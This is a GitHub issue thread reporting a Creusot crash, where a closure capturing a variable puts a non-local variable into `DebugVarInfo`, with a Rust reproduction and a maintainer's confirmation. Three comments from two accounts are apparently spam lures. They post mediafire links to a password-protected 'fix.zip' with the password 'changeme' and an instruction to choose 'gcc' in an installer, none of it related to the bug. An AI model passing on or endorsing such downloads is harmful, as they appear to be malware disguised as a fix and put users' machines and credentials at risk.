### ISSUE TITLE
Capturing a variable in a closure introduces a non-local variable in `DebugVarInfo`

### ISSUE THREAD

**Issue by arnaudgolfouse** [creusot-rs/creusot#1072]
More specifically, Creusot assumes that `DebugVarInfo` only contains local variables, but then the following crashes:

```rust,creusot
fn crashes() {
    let mut x = Vec::new();
    let _closure = || {
        x.push(42);
        let prev = Some(3);
        proof_assert!(prev != None);
    };
}
```

This triggers an "called `Option::unwrap()` on a `None` value" error in `creusot::translation::specification::ScopeTree::build`, caused by the capture of `x`.

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jhjourdan** [comment]
Interestingly, I just hit the same bug trying to write closure tests.
